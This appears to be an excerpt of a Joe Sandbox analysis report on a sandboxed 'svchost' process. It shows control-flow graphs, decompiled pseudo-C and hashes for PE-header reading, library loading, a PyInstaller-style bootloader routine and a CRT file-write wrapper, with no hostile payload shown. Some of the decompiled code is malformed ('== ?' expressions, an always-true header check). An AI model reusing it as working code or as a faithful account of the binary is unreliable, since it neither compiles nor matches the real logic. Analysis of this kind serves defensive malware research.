                            control_flow_graph 637 bc1120-bc1153 call bc9f16 call bc9b2b 642 bc1159-bc115c 637->642 643 bc11f2-bc11f7 637->643 642->643 644 bc1162-bc1189 call bc9f16 call bc9b2b call bc9f16 642->644 650 bc118e-bc11a8 call bc9b2b 644->650 650->643 653 bc11aa-bc11ad 650->653 654 bc11af-bc11b4 653->654 655 bc11b6-bc11b9 653->655 656 bc11c0-bc11f1 call bc9f16 call bc9b2b 654->656 655->643 657 bc11bb 655->657 657->656
                            C-Code - Quality: 100%
                            			E00BC1120(void* __edx, void* _a4) {
				char _v4;
				signed int _t15;
				intOrPtr _t30;
				signed int _t32;

				_t34 = __edx;
				_t35 = _a4;
				_v4 = 0;
				E00BC9F16(__edx,  *_a4, 0, 0); // executed
				E00BC9B2B( &_a4, 1, 2,  *_a4); // executed
				_t15 = _a4;
				if(_t15 != 0x4d || _t15 != 0x5a) {
					L8:
					return _t15 | 0xffffffff;
				} else {
					E00BC9F16(__edx,  *_t35, 0x3c, 0); // executed
					E00BC9B2B( &_v4, 4, 1,  *_t35);
					E00BC9F16(__edx,  *_t35, _v4 + 0x18, 0); // executed
					E00BC9B2B( &_a4, 2, 1,  *_t35);
					_t15 = _a4;
					if(_t15 != 0xb) {
						goto L8;
					} else {
						if(_t15 != 1) {
							if(_t15 != 2) {
								goto L8;
							} else {
								_t32 = 0xa8;
								goto L7;
							}
						} else {
							_t32 = 0x98;
							L7:
							E00BC9F16(_t34,  *_t35, _v4 + _t32, 0);
							E00BC9B2B( &_v4, 4, 1,  *_t35);
							_t30 = _v4;
							_t31 =  ==  ? _t32 | 0xffffffff : _t30;
							return  ==  ? _t32 | 0xffffffff : _t30;
						}
					}
				}
			}







                            0x00bc1120
                            0x00bc1122
                            0x00bc112a
                            0x00bc1134
                            0x00bc1144
                            0x00bc1149
                            0x00bc1153
                            0x00bc11f2
                            0x00bc11f7
                            0x00bc1162
                            0x00bc1168
                            0x00bc1178
                            0x00bc1189
                            0x00bc1199
                            0x00bc119e
                            0x00bc11a8
                            0x00000000
                            0x00bc11aa
                            0x00bc11ad
                            0x00bc11b9
                            0x00000000
                            0x00bc11bb
                            0x00bc11bb
                            0x00000000
                            0x00bc11bb
                            0x00bc11af
                            0x00bc11af
                            0x00bc11c0
                            0x00bc11cb
                            0x00bc11db
                            0x00bc11e0
                            0x00bc11ec
                            0x00bc11f1
                            0x00bc11f1
                            0x00bc11ad
                            0x00bc11a8

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: 0f18c8a29637b3e68dead0b09e1943be6a98e9a9608b54b83cbe93af802145a5
                            • Instruction ID: 6562a225a6d9a55a652f5c0f4fdcab9b1f01f768efeb802c34641febffc84a15
                            • Opcode Fuzzy Hash: 0f18c8a29637b3e68dead0b09e1943be6a98e9a9608b54b83cbe93af802145a5
                            • Instruction Fuzzy Hash: DE21DC71644301BAFA306E18CC87F9A73DAEF41724F14095DF3D0BA1D6DAAADC428B06
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD3623, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 662 bd3623-bd3637 663 bd3639-bd3642 662->663 664 bd3644-bd365f LoadLibraryExW 662->664 665 bd369b-bd369d 663->665 666 bd3688-bd368e 664->666 667 bd3661-bd366a GetLastError 664->667 670 bd3697 666->670 671 bd3690-bd3691 FreeLibrary 666->671 668 bd366c-bd3677 LoadLibraryExW 667->668 669 bd3679 667->669 673 bd367b-bd367d 668->673 669->673 672 bd3699-bd369a 670->672 671->670 672->665 673->666 674 bd367f-bd3686 673->674 674->672
                            C-Code - Quality: 95%
                            			E00BD3623(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xbf6318 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xbe52d0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xdc55bb76
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











                            0x00bd3628
                            0x00bd362c
                            0x00bd3633
                            0x00bd3637
                            0x00bd3645
                            0x00bd3655
                            0x00bd365b
                            0x00bd365f
                            0x00bd3688
                            0x00bd368a
                            0x00bd368e
                            0x00bd3691
                            0x00bd3691
                            0x00bd3697
                            0x00bd3699
                            0x00000000
                            0x00bd369a
                            0x00bd3661
                            0x00bd366a
                            0x00bd3679
                            0x00bd366c
                            0x00bd366f
                            0x00bd3675
                            0x00bd3675
                            0x00bd367d
                            0x00000000
                            0x00bd367f
                            0x00bd3682
                            0x00bd3684
                            0x00000000
                            0x00bd3684
                            0x00bd367d
                            0x00bd3639
                            0x00bd363e
                            0x00000000

                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00BCA8EB,00000000,00000000,?,00BD35CA,00BCA8EB,00000000,00000000,00000000,?,00BD3889,00000006,FlsSetValue), ref: 00BD3655
                            • GetLastError.KERNEL32(?,00BD35CA,00BCA8EB,00000000,00000000,00000000,?,00BD3889,00000006,FlsSetValue,00BE57B4,00BE57BC,00000000,00000364,?,00BD44F7), ref: 00BD3661
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BD35CA,00BCA8EB,00000000,00000000,00000000,?,00BD3889,00000006,FlsSetValue,00BE57B4,00BE57BC,00000000), ref: 00BD366F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 04f3f4141535950b89122747bc35fcc940189aac7c653922ac30ef19a7fdac46
                            • Instruction ID: 83614d5b7ab0062dcfd3b828f8afdd9a72f3f74cdb05e2738fec975dd08a5e3f
                            • Opcode Fuzzy Hash: 04f3f4141535950b89122747bc35fcc940189aac7c653922ac30ef19a7fdac46
                            • Instruction Fuzzy Hash: 29012B32619326BBC7218B78AC84E56B7D8EF04F617210661F909DB342EB70DD40C7E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC2450, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 207COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 675 bc2450-bc2491 call bc7880 call bca7eb call bcd2be call bc1770 684 bc24ad-bc24bf call bc27a0 675->684 685 bc2493-bc24ac call bc786a 675->685 684->685 690 bc24c1-bc24d8 call bc26f0 684->690 690->685 693 bc24da-bc24f1 call bc2930 690->693 693->685 696 bc24f3-bc251a call bc3e40 call bc43d0 call bc1690 693->696 703 bc251c-bc252f call bc1690 696->703 704 bc2566-bc257c 696->704 703->704 712 bc2531-bc2565 call bc1910 call bc786a 703->712 706 bc257e-bc2589 call bc21d0 704->706 707 bc2596-bc25b7 call bc4bf0 SetDllDirectoryW call bc9803 704->707 716 bc258f 706->716 717 bc2656-bc2661 call bc2070 706->717 721 bc25bd-bc25bf 707->721 722 bc264f 707->722 716->707 727 bc269d-bc26a0 717->727 728 bc2663-bc269b call bc4390 call bc3e40 call bc80a0 717->728 725 bc25c6-bc25ca 721->725 722->717 730 bc25cc-bc25ce 725->730 731 bc25e6-bc25e8 725->731 729 bc26d6-bc26ee call bc786a 727->729 728->727 752 bc26a2-bc26c0 call bc23d0 call bc4400 728->752 734 bc25d0-bc25d6 730->734 735 bc25e2-bc25e4 730->735 736 bc25eb-bc25ed 731->736 734->731 739 bc25d8-bc25e0 734->739 735->736 740 bc25ef-bc260e call bc1ac0 736->740 741 bc2633-bc264a call bc2140 call bc2010 call bc2130 736->741 739->725 739->735 740->727 751 bc2614-bc2624 740->751 760 bc26d4 741->760 754 bc2626-bc2631 751->754 762 bc26cb-bc26d1 call bc1730 752->762 763 bc26c2-bc26c3 call bc40e0 752->763 754->741 754->754 760->729 762->760 766 bc26c8 763->766 766->762
                            C-Code - Quality: 40%
                            			E00BC2450(void* __edx, void* __eflags, char _a4092, char _a4096, char _a8192, signed int _a12284, signed int _a12288, intOrPtr _a12292, intOrPtr _a12296, intOrPtr _a12300) {
				char _v0;
				char _v4;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t35;
				signed int _t39;
				signed int _t49;
				signed int _t52;
				signed int _t53;
				signed int _t60;
				signed int _t63;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				void* _t76;
				signed int _t77;
				void* _t79;
				signed int _t85;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				intOrPtr _t98;
				signed int _t101;
				intOrPtr* _t102;
				intOrPtr _t104;
				signed int _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t115;
				void* _t117;
				void* _t120;

				_t120 = __eflags;
				_t90 = __edx;
				E00BC7880();
				_t35 =  *0xbec008; // 0xdc55bb75
				_a12288 = _t35 ^ _t108;
				_t104 = _a12300;
				E00BCD2BE(E00BCA7EB(2), 0);
				_push(0);
				_t39 = E00BC1770(_t120);
				_t93 = _t39;
				_t110 = _t108 + 0x10;
				if(_t93 != 0) {
					_t39 = E00BC27A0(__edx,  &_v0, _v0);
					_t110 = _t110 + 8;
					__eflags = _t39;
					if(_t39 == 0) {
						goto L1;
					} else {
						_t39 = E00BC26F0( &_a8192,  &_v0);
						_t110 = _t110 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							goto L1;
						} else {
							_t39 = L00BC2930(__eflags,  &_a4096,  &_v0);
							_t110 = _t110 + 8;
							__eflags = _t39;
							if(_t39 == 0) {
								goto L1;
							} else {
								_push(_t76);
								_push("_MEIPASS2");
								_t77 = E00BC3E40(_t76, _t93);
								E00BC43D0("_MEIPASS2");
								_t49 = E00BC1690(_t104, _t93,  &_v0);
								_t112 = _t110 + 0x10;
								__eflags = _t49;
								if(_t49 != 0) {
									L8:
									 *((intOrPtr*)(_t93 + 0x4074)) = _t104;
									_t98 = _a12296;
									 *((intOrPtr*)(_t93 + 0x4070)) = _t98;
									__eflags = _t77;
									if(_t77 != 0) {
										L11:
										__imp__SetDllDirectoryW(E00BC4BF0(0, _t77, 0));
										L00BC9803(_t50);
										_t114 = _t112 + 0x10;
										__eflags = _t77;
										if(_t77 == 0) {
											_t98 = _a12292;
											goto L25;
										} else {
											_t85 = _t77;
											_t63 =  &_a4092;
											while(1) {
												_t91 =  *_t63;
												__eflags = _t91 -  *_t85;
												if(_t91 !=  *_t85) {
													break;
												}
												__eflags = _t91;
												if(_t91 == 0) {
													L17:
													_t64 = 0;
												} else {
													_t91 =  *((intOrPtr*)(_t63 + 1));
													__eflags = _t91 -  *((intOrPtr*)(_t85 + 1));
													if(_t91 !=  *((intOrPtr*)(_t85 + 1))) {
														break;
													} else {
														_t63 = _t63 + 2;
														_t85 = _t85 + 2;
														__eflags = _t91;
														if(_t91 != 0) {
															continue;
														} else {
															goto L17;
														}
													}
												}
												L19:
												__eflags = _t64;
												if(__eflags == 0) {
													L23:
													_push(_t93);
													E00BC2140(_t91, __eflags);
													_t101 = E00BC2010(_t77, __eflags, _t93);
													L00BC2130(_t93);
													_t115 = _t114 + 0xc;
													goto L31;
												} else {
													_t21 = _t93 + 0x2068; // 0x2068
													_t102 = _t21;
													_t52 = E00BC1AC0(_t102, 0x1000, "%s", _t77);
													_t115 = _t114 + 0x10;
													__eflags = _t52 - 0x1000;
													if(_t52 >= 0x1000) {
														goto L27;
													} else {
														_t22 = _t93 + 0x3068; // 0x3068
														 *((intOrPtr*)(_t93 + 0x4068)) = 1;
														_t87 = _t22 - _t102;
														__eflags = _t87;
														do {
															_t68 =  *_t102;
															_t102 = _t102 + 1;
															 *((char*)(_t87 + _t102 - 1)) = _t68;
															__eflags = _t68;
														} while (__eflags != 0);
														goto L23;
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t64 = _t63 | 0x00000001;
											__eflags = _t64;
											goto L19;
										}
									} else {
										_t69 = E00BC21D0(_t93);
										_t114 = _t112 + 4;
										__eflags = _t69;
										if(_t69 != 0) {
											L25:
											_t52 = E00BC2070(_t90, _t104, _t93);
											_t115 = _t114 + 4;
											__eflags = _t52;
											if(_t52 != 0) {
												L27:
												_t53 = _t52 | 0xffffffff;
											} else {
												__eflags =  *((char*)(_t93 + 0x2068));
												_t29 = _t93 + 0x2068; // 0x2068
												_t79 = _t29;
												_t55 =  !=  ? _t79 :  &_a4092;
												E00BC4390("_MEIPASS2",  !=  ? _t79 :  &_a4092);
												_push("_MEIPASS2");
												E00BC3E40(_t79, _t93);
												_push(_t93);
												_t52 = E00BC80A0();
												_t115 = _t115 + 0x10;
												__eflags = _t52 - 0xffffffff;
												if(__eflags != 0) {
													E00BC23D0(_t52);
													_push(_t104);
													_push(_t98);
													_push(_t93);
													_push( &_v4);
													_t60 = E00BC4400(_t90, _t104, __eflags);
													_t117 = _t115 + 0x10;
													_t101 = _t60;
													__eflags =  *((intOrPtr*)(_t93 + 0x4068)) - 1;
													if( *((intOrPtr*)(_t93 + 0x4068)) == 1) {
														_push(_t79); // executed
														E00BC40E0(_t90); // executed
														_t117 = _t117 + 4;
													}
													E00BC1730(_t90, _t104, _t93);
													_t115 = _t117 + 4;
													L31:
													_t53 = _t101;
												} else {
													goto L27;
												}
											}
										} else {
											_t77 =  &_a4096;
											goto L11;
										}
									}
									L32:
									__eflags = _a12284 ^ _t115;
									E00BC786A();
									return _t53;
								} else {
									_t71 = E00BC1690(_t104, _t93,  &_a8192);
									_t112 = _t112 + 8;
									__eflags = _t71;
									if(__eflags != 0) {
										goto L8;
									} else {
										_push( &_a8192);
										_t74 = E00BC1910(__eflags, "Cannot open self %s or archive %s\n",  &_v0);
										__eflags = _a12288 ^ _t112 + 0x0000000c;
										E00BC786A();
										return _t74 | 0xffffffff;
									}
								}
							}
						}
					}
				} else {
					L1:
					E00BC786A();
					return _t39 | 0xffffffff;
				}
			}






































                            0x00bc2450
                            0x00bc2450
                            0x00bc2455
                            0x00bc245a
                            0x00bc2461
                            0x00bc2469
                            0x00bc247e
                            0x00bc2483
                            0x00bc2485
                            0x00bc248a
                            0x00bc248c
                            0x00bc2491
                            0x00bc24b5
                            0x00bc24ba
                            0x00bc24bd
                            0x00bc24bf
                            0x00000000
                            0x00bc24c1
                            0x00bc24ce
                            0x00bc24d3
                            0x00bc24d6
                            0x00bc24d8
                            0x00000000
                            0x00bc24da
                            0x00bc24e7
                            0x00bc24ec
                            0x00bc24ef
                            0x00bc24f1
                            0x00000000
                            0x00bc24f3
                            0x00bc24f3
                            0x00bc24f4
                            0x00bc2503
                            0x00bc2505
                            0x00bc2510
                            0x00bc2515
                            0x00bc2518
                            0x00bc251a
                            0x00bc2566
                            0x00bc2566
                            0x00bc256d
                            0x00bc2574
                            0x00bc257a
                            0x00bc257c
                            0x00bc2596
                            0x00bc25a6
                            0x00bc25ad
                            0x00bc25b2
                            0x00bc25b5
                            0x00bc25b7
                            0x00bc264f
                            0x00000000
                            0x00bc25bd
                            0x00bc25bd
                            0x00bc25bf
                            0x00bc25c6
                            0x00bc25c6
                            0x00bc25c8
                            0x00bc25ca
                            0x00000000
                            0x00000000
                            0x00bc25cc
                            0x00bc25ce
                            0x00bc25e2
                            0x00bc25e2
                            0x00bc25d0
                            0x00bc25d0
                            0x00bc25d3
                            0x00bc25d6
                            0x00000000
                            0x00bc25d8
                            0x00bc25d8
                            0x00bc25db
                            0x00bc25de
                            0x00bc25e0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc25e0
                            0x00bc25d6
                            0x00bc25eb
                            0x00bc25eb
                            0x00bc25ed
                            0x00bc2633
                            0x00bc2633
                            0x00bc2634
                            0x00bc2640
                            0x00bc2642
                            0x00bc2647
                            0x00000000
                            0x00bc25ef
                            0x00bc25f5
                            0x00bc25f5
                            0x00bc2601
                            0x00bc2606
                            0x00bc2609
                            0x00bc260e
                            0x00000000
                            0x00bc2614
                            0x00bc2614
                            0x00bc261a
                            0x00bc2624
                            0x00bc2624
                            0x00bc2626
                            0x00bc2626
                            0x00bc2628
                            0x00bc262b
                            0x00bc262f
                            0x00bc262f
                            0x00000000
                            0x00bc2626
                            0x00bc260e
                            0x00000000
                            0x00bc25ed
                            0x00bc25e6
                            0x00bc25e8
                            0x00bc25e8
                            0x00000000
                            0x00bc25e8
                            0x00bc257e
                            0x00bc257f
                            0x00bc2584
                            0x00bc2587
                            0x00bc2589
                            0x00bc2656
                            0x00bc2657
                            0x00bc265c
                            0x00bc265f
                            0x00bc2661
                            0x00bc269d
                            0x00bc269d
                            0x00bc2663
                            0x00bc2663
                            0x00bc266a
                            0x00bc266a
                            0x00bc2677
                            0x00bc2680
                            0x00bc2685
                            0x00bc268a
                            0x00bc268f
                            0x00bc2690
                            0x00bc2695
                            0x00bc2698
                            0x00bc269b
                            0x00bc26a2
                            0x00bc26a7
                            0x00bc26a8
                            0x00bc26ad
                            0x00bc26ae
                            0x00bc26af
                            0x00bc26b4
                            0x00bc26b7
                            0x00bc26b9
                            0x00bc26c0
                            0x00bc26c2
                            0x00bc26c3
                            0x00bc26c8
                            0x00bc26c8
                            0x00bc26cc
                            0x00bc26d1
                            0x00bc26d4
                            0x00bc26d4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc269b
                            0x00bc258f
                            0x00bc258f
                            0x00000000
                            0x00bc258f
                            0x00bc2589
                            0x00bc26d6
                            0x00bc26e1
                            0x00bc26e3
                            0x00bc26ee
                            0x00bc251c
                            0x00bc2525
                            0x00bc252a
                            0x00bc252d
                            0x00bc252f
                            0x00000000
                            0x00bc2531
                            0x00bc2538
                            0x00bc2543
                            0x00bc2558
                            0x00bc255a
                            0x00bc2565
                            0x00bc2565
                            0x00bc252f
                            0x00bc251a
                            0x00bc24f1
                            0x00bc24d8
                            0x00bc2493
                            0x00bc2493
                            0x00bc24a1
                            0x00bc24ac
                            0x00bc24ac

                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID: Cannot open self %s or archive %s$_MEIPASS2
                            • API String ID: 0-930416966
                            • Opcode ID: 809ffe98af346ba00eff5474f8db185799c0840577872c886a994e2bd7be8c3e
                            • Instruction ID: 0c881da09ee5a96b7feed6cb3ca558170ab86a5f16dff91839f3f00dd3a5e326
                            • Opcode Fuzzy Hash: 809ffe98af346ba00eff5474f8db185799c0840577872c886a994e2bd7be8c3e
                            • Instruction Fuzzy Hash: 99515C729042406BE621BB709C92FAB73DCEF91354F0405BDF95882283FB25DA18C6B3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD308B, Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 768 bd308b-bd30b0 769 bd30b9-bd30bb 768->769 770 bd30b2-bd30b4 768->770 772 bd30bd-bd30d7 call bcc9bb call bcc9ce call bd1788 769->772 773 bd30dc-bd3101 769->773 771 bd3287-bd3296 call bc786a 770->771 772->771 775 bd3108-bd310e 773->775 776 bd3103-bd3106 773->776 781 bd312d 775->781 782 bd3110-bd3128 call bcc9bb call bcc9ce call bd1788 775->782 776->775 780 bd3130-bd3135 776->780 785 bd3137-bd3143 call bd2807 780->785 786 bd3146-bd314f call bd2c30 780->786 781->780 816 bd327e-bd3281 782->816 785->786 797 bd318a-bd319c 786->797 798 bd3151-bd3153 786->798 800 bd319e-bd31a4 797->800 801 bd31e4-bd3205 WriteFile 797->801 802 bd3155-bd315a 798->802 803 bd3177-bd3180 call bd2a10 798->803 810 bd31d4-bd31e2 call bd2ca6 800->810 811 bd31a6-bd31a9 800->811 807 bd3207-bd320d GetLastError 801->807 808 bd3210 801->808 804 bd324e-bd3260 802->804 805 bd3160-bd316d call bd2bc3 802->805 817 bd3185-bd3188 803->817 814 bd326b-bd327b call bcc9ce call bcc9bb 804->814 815 bd3262-bd3265 804->815 825 bd3170-bd3172 805->825 807->808 818 bd3213-bd321e 808->818 810->817 819 bd31ab-bd31ae 811->819 820 bd31c4-bd31d2 call bd2e73 811->820 814->816 815->814 823 bd3267-bd3269 815->823 829 bd3286 816->829 817->825 826 bd3220-bd3225 818->826 827 bd3283 818->827 819->804 828 bd31b4-bd31c2 call bd2d85 819->828 820->817 823->829 825->818 833 bd324b 826->833 834 bd3227-bd322c 826->834 827->829 828->817 829->771 833->804 837 bd322e-bd3240 call bcc9ce call bcc9bb 834->837 838 bd3242-bd3249 call bcc998 834->838 837->816 838->816
                            C-Code - Quality: 97%
                            			E00BD308B(signed int _a4, void* _a8, signed int _a12) {
				signed int _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				signed int _t62;
				intOrPtr _t66;
				signed char _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				intOrPtr _t78;
				signed int _t80;
				signed int _t84;
				signed int _t87;
				signed int _t101;
				signed int _t102;
				signed int _t105;
				intOrPtr _t107;
				signed int _t112;
				signed int _t114;
				void* _t116;
				signed int _t120;
				signed int _t123;
				signed int _t125;
				void* _t126;

				_t62 =  *0xbec008; // 0xdc55bb75
				_v8 = _t62 ^ _t125;
				_t105 = _a12;
				_v12 = _t105;
				_t120 = _a4;
				_t116 = _a8;
				_v52 = _t116;
				if(_t105 != 0) {
					__eflags = _t116;
					if(_t116 != 0) {
						_t101 = _t120 >> 6;
						_t114 = (_t120 & 0x0000003f) * 0x30;
						_v32 = _t101;
						_t66 =  *((intOrPtr*)(0xbf6108 + _t101 * 4));
						_v48 = _t66;
						_v28 = _t114;
						_t102 =  *((intOrPtr*)(_t66 + _t114 + 0x29));
						__eflags = _t102 - 2;
						if(_t102 == 2) {
							L6:
							_t68 =  !_t105;
							__eflags = _t68 & 0x00000001;
							if((_t68 & 0x00000001) != 0) {
								_t66 = _v48;
								L9:
								__eflags =  *(_t66 + _t114 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E00BD2807(_t120, 0, 0, 2);
									_t126 = _t126 + 0x10;
								}
								_t69 = E00BD2C30(_t102, _t114, __eflags, _t120);
								__eflags = _t69;
								if(_t69 == 0) {
									_t107 =  *((intOrPtr*)(0xbf6108 + _v32 * 4));
									_t71 = _v28;
									__eflags =  *(_t107 + _t71 + 0x28) & 0x00000080;
									if(( *(_t107 + _t71 + 0x28) & 0x00000080) == 0) {
										_v24 = 0;
										_v20 = 0;
										_v16 = 0;
										_t73 = WriteFile( *(_t107 + _t71 + 0x18), _t116, _v12,  &_v20, 0); // executed
										__eflags = _t73;
										if(_t73 == 0) {
											_v24 = GetLastError();
										}
										goto L28;
									}
									_t84 = _t102;
									__eflags = _t84;
									if(_t84 == 0) {
										E00BD2CA6( &_v24, _t120, _t116, _v12);
										goto L17;
									}
									_t87 = _t84 - 1;
									__eflags = _t87;
									if(_t87 == 0) {
										_t86 = E00BD2E73( &_v24, _t120, _t116, _v12);
										goto L17;
									}
									__eflags = _t87 != 1;
									if(_t87 != 1) {
										goto L34;
									}
									_t86 = E00BD2D85( &_v24, _t120, _t116, _v12);
									goto L17;
								} else {
									__eflags = _t102;
									if(_t102 == 0) {
										_t86 = E00BD2A10( &_v24, _t120, _t116, _v12);
										L17:
										L15:
										L28:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t74 = _v40;
										__eflags = _t74;
										if(_t74 != 0) {
											_t75 = _t74 - _v36;
											__eflags = _t75;
											L40:
											L41:
											E00BC786A();
											return _t75;
										}
										_t76 = _v44;
										__eflags = _t76;
										if(_t76 == 0) {
											_t116 = _v52;
											L34:
											_t112 = _v28;
											_t78 =  *((intOrPtr*)(0xbf6108 + _v32 * 4));
											__eflags =  *(_t78 + _t112 + 0x28) & 0x00000040;
											if(( *(_t78 + _t112 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E00BCC9CE())) = 0x1c;
												_t80 = E00BCC9BB();
												 *_t80 =  *_t80 & 0x00000000;
												__eflags =  *_t80;
												L38:
												_t75 = _t80 | 0xffffffff;
												goto L40;
											}
											__eflags =  *_t116 - 0x1a;
											if( *_t116 != 0x1a) {
												goto L37;
											}
											_t75 = 0;
											goto L40;
										}
										_t123 = 5;
										__eflags = _t76 - _t123;
										if(_t76 != _t123) {
											_t80 = E00BCC998(_t76);
										} else {
											 *((intOrPtr*)(E00BCC9CE())) = 9;
											_t80 = E00BCC9BB();
											 *_t80 = _t123;
										}
										goto L38;
									}
									__eflags = _t102 - 1 - 1;
									if(_t102 - 1 > 1) {
										goto L34;
									}
									E00BD2BC3( &_v24, _t116, _v12);
									goto L15;
								}
							}
							 *(E00BCC9BB()) =  *_t94 & 0x00000000;
							 *((intOrPtr*)(E00BCC9CE())) = 0x16;
							_t80 = E00BD1788();
							goto L38;
						}
						__eflags = _t102 - 1;
						if(_t102 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E00BCC9BB()) =  *_t96 & _t116;
					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
					_t75 = E00BD1788() | 0xffffffff;
					goto L41;
				}
				_t75 = 0;
				goto L41;
			}








































                            0x00bd3093
                            0x00bd309a
                            0x00bd309d
                            0x00bd30a0
                            0x00bd30a4
                            0x00bd30a8
                            0x00bd30ab
                            0x00bd30b0
                            0x00bd30b9
                            0x00bd30bb
                            0x00bd30e1
                            0x00bd30e7
                            0x00bd30ea
                            0x00bd30ed
                            0x00bd30f4
                            0x00bd30f7
                            0x00bd30fa
                            0x00bd30fe
                            0x00bd3101
                            0x00bd3108
                            0x00bd310a
                            0x00bd310c
                            0x00bd310e
                            0x00bd312d
                            0x00bd3130
                            0x00bd3130
                            0x00bd3135
                            0x00bd313e
                            0x00bd3143
                            0x00bd3143
                            0x00bd3147
                            0x00bd314d
                            0x00bd314f
                            0x00bd318d
                            0x00bd3194
                            0x00bd3197
                            0x00bd319c
                            0x00bd31eb
                            0x00bd31ee
                            0x00bd31f1
                            0x00bd31fd
                            0x00bd3203
                            0x00bd3205
                            0x00bd320d
                            0x00bd320d
                            0x00000000
                            0x00bd3210
                            0x00bd31a1
                            0x00bd31a1
                            0x00bd31a4
                            0x00bd31dd
                            0x00000000
                            0x00bd31dd
                            0x00bd31a6
                            0x00bd31a6
                            0x00bd31a9
                            0x00bd31cd
                            0x00000000
                            0x00bd31cd
                            0x00bd31ab
                            0x00bd31ae
                            0x00000000
                            0x00000000
                            0x00bd31bd
                            0x00000000
                            0x00bd3151
                            0x00bd3151
                            0x00bd3153
                            0x00bd3180
                            0x00bd3185
                            0x00bd3170
                            0x00bd3213
                            0x00bd3216
                            0x00bd3217
                            0x00bd3218
                            0x00bd3219
                            0x00bd321c
                            0x00bd321e
                            0x00bd3283
                            0x00bd3283
                            0x00bd3286
                            0x00bd3287
                            0x00bd328e
                            0x00bd3296
                            0x00bd3296
                            0x00bd3220
